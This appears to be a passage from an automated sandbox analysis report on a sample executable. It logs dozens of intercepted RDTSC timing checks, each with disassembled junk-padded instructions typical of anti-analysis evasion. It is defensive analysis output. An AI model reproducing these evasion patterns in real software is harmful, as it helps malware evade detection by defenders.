              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6CF0A second address: F6CF0F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F6D04E second address: F6D054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F7B639 second address: F7B63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F7B4D9 second address: F7B4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F761E4 second address: F761EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F761EB second address: F761FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F08BA1E3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F761FD second address: F76211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F76211 second address: F7622F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jne 00007F7F08BA1E36h 0x00000010 jmp 00007F7F08BA1E3Bh 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F7622F second address: F76236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F8AAC3 second address: F8AADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E46h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F9ED1D second address: F9ED27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F08F64186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F9EE92 second address: F9EEB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F7F08BA1E42h 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F9EEB5 second address: F9EED0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64196h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F9EED0 second address: F9EED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F9EED6 second address: F9EEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F9F039 second address: F9F03F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F9F7B0 second address: F9F7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F9F7B4 second address: F9F7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: FA1601 second address: FA1606 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: FA1606 second address: FA1639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F7F08BA1E3Eh 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7F08BA1E46h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: FA1639 second address: FA1641 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: FA1641 second address: FA166A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E42h 0x00000009 jmp 00007F7F08BA1E43h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: FA166A second address: FA1670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: FA6ED6 second address: FA6EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: FA6EDC second address: FA6EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: FA892E second address: FA8938 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7F08BA1E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: FA8938 second address: FA8957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F7F08F64196h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EC2BBD second address: EC2BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBE910 second address: EBE91A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7F08F64186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: EBED4A second address: EBED4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56203B6 second address: 56203C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F7F08F6418Bh 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56203C7 second address: 56203FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 pushfd 0x00000006 jmp 00007F7F08BA1E41h 0x0000000b adc ax, 7E86h 0x00000010 jmp 00007F7F08BA1E41h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56203FF second address: 5620405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5620405 second address: 5620482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, B7E6h 0x00000007 mov ax, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F7F08BA1E49h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F7F08BA1E3Ch 0x0000001c sbb esi, 0F5AE6B8h 0x00000022 jmp 00007F7F08BA1E3Bh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F7F08BA1E48h 0x0000002e sub cx, 2118h 0x00000033 jmp 00007F7F08BA1E3Bh 0x00000038 popfd 0x00000039 popad 0x0000003a mov edx, dword ptr [ebp+0Ch] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5620482 second address: 5620488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5620488 second address: 562049F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 562049F second address: 56204A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56204A3 second address: 56204A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56204A9 second address: 56204B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F6418Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5620502 second address: 5620527 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7F08BA1E40h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F08BA1E3Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5620527 second address: 5620539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F6418Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56506AC second address: 56506B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56506B0 second address: 56506B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56506B6 second address: 56506D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F08BA1E3Eh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56506D9 second address: 565078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7F08F64191h 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F7F08F64193h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 movzx esi, dx 0x0000001a pushfd 0x0000001b jmp 00007F7F08F64191h 0x00000020 and ecx, 67A14A46h 0x00000026 jmp 00007F7F08F64191h 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, ecx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F7F08F6418Ch 0x00000035 and ah, FFFFFFE8h 0x00000038 jmp 00007F7F08F6418Bh 0x0000003d popfd 0x0000003e pushfd 0x0000003f jmp 00007F7F08F64198h 0x00000044 add esi, 3645C148h 0x0000004a jmp 00007F7F08F6418Bh 0x0000004f popfd 0x00000050 popad 0x00000051 push eax 0x00000052 pushad 0x00000053 mov ax, di 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 565078B second address: 565078F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 565078F second address: 56507B8 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F7F08F64199h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56507B8 second address: 56507BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56507BC second address: 56507C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56507C0 second address: 56507C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56507C6 second address: 56507DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F64191h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56507DB second address: 56507E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56507E9 second address: 56507ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56507ED second address: 5650838 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7F08BA1E42h 0x0000000c sbb eax, 346F6B98h 0x00000012 jmp 00007F7F08BA1E3Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cx, di 0x00000020 jmp 00007F7F08BA1E47h 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56508E1 second address: 565091C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bh, 7Ch 0x00000012 jmp 00007F7F08F64194h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 565091C second address: 5650922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650922 second address: 5650932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650932 second address: 5650944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 565099A second address: 56509D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F7F08F64190h 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7F08F64197h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56509D5 second address: 56509DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56509DB second address: 56509DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56509DF second address: 5640013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f sub esp, 04h 0x00000012 xor ebx, ebx 0x00000014 cmp eax, 00000000h 0x00000017 je 00007F7F08BA1F9Ah 0x0000001d mov dword ptr [esp], 0000000Dh 0x00000024 call 00007F7F0D4FDFD1h 0x00000029 mov edi, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007F7F08BA1E3Ah 0x00000033 mov dx, si 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640013 second address: 564003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 43h 0x00000005 jmp 00007F7F08F64196h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov si, 751Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564003B second address: 564007E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7F08BA1E44h 0x00000008 and eax, 3C4E53A8h 0x0000000e jmp 00007F7F08BA1E3Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7F08BA1E44h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564007E second address: 56400DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007F7F08F64192h 0x00000011 pop eax 0x00000012 mov edi, 7364F926h 0x00000017 popad 0x00000018 mov ebx, 429781B2h 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F7F08F64199h 0x00000025 sub esp, 2Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F7F08F6418Dh 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56400DC second address: 56400F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56400F8 second address: 56400FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56400FC second address: 5640100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640100 second address: 5640106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640106 second address: 5640190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7F08BA1E3Bh 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F7F08BA1E46h 0x00000015 xchg eax, edi 0x00000016 jmp 00007F7F08BA1E40h 0x0000001b push eax 0x0000001c pushad 0x0000001d call 00007F7F08BA1E41h 0x00000022 mov edx, esi 0x00000024 pop ecx 0x00000025 call 00007F7F08BA1E3Dh 0x0000002a mov edi, ecx 0x0000002c pop ecx 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F7F08BA1E46h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56401EF second address: 5640207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564032A second address: 5640330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640330 second address: 5640336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640336 second address: 5640351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640351 second address: 5640355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640355 second address: 564035B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403A4 second address: 56403C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov al, 02h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov edi, 1BDAB83Ah 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403C5 second address: 56403EB instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 jg 00007F7F7917FEF5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7F08BA1E44h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403EB second address: 56403EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403EF second address: 56403F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403F5 second address: 564040B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, DA43h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F7F08F641DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564040B second address: 564040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564040F second address: 564041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564041D second address: 5640477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007F7F08BA1E46h 0x00000011 jne 00007F7F7917FE8Ch 0x00000017 jmp 00007F7F08BA1E40h 0x0000001c mov ebx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7F08BA1E47h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640477 second address: 564047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
